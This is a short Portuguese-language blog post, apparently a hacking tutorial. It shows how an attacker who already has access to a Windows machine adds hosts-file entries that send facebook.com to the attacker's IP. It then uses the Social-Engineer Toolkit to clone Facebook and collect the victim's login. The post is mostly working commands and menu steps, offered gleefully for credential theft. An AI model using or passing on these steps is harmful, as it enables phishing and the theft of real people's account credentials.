Após uma invasão você tem milhares de coisas que pode fazer, nesse caso simula um exemplo em já se tinha invadido o alvo e o hacker esta se conectando novamente, então as partes anteriores do Teste de invasão foram omitidas. Então vamos lá.
Com o comando echo iremos escrever na ultima linha o ip do atacante e o site que queremos roubar a autenticação, faremos isso para que quando a nossa vitima digitar em seu navegador o endereço que especificamos ela sera redirecionada para o nosso ip. Usaremos o hosts que é um arquivo do computador utilizado pelo sistema operacional destinado a relacionar os hostnames e endereços ip,
ele esta dentro de C:/WINDOWS/system32/drivers/etc/
Comandos:
1: echo 192.168.0.102 www.facebook.com >> C:\\WINDOWS\\system32\\drivers\\etc\\hosts
2: echo 192.168.0.102 pt-br.facebook.com >> C:\\WINDOWS\\system32\\drivers\\etc\\hosts 
Vamos verificar o arquivo host:
Comando:
1: type C:\\WINDOWS\\system32\\drivers\\etc\\hosts 
Uma vez que ocorreu tudo ok podemos abrir uma nova aba e usar o setoolkit para clonar o nosso site as opções são 1 2 3 2, você digita o seu ip o site que quer clonar.
root@kali~# setookit
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
192.168.0.102
https://www.facebook.com 
O Set vai mandar tudo para o diretorio /var /www/ ele gera 3 arquivos.
Quando o alvo digitar www.facebook.com ele sera direcionado para o nosso ip que por sua vez está com o facebook clonado
Vualá após a vitima logar você terá as credências dentro do arquivo harverster_* :D
Nenhum comentário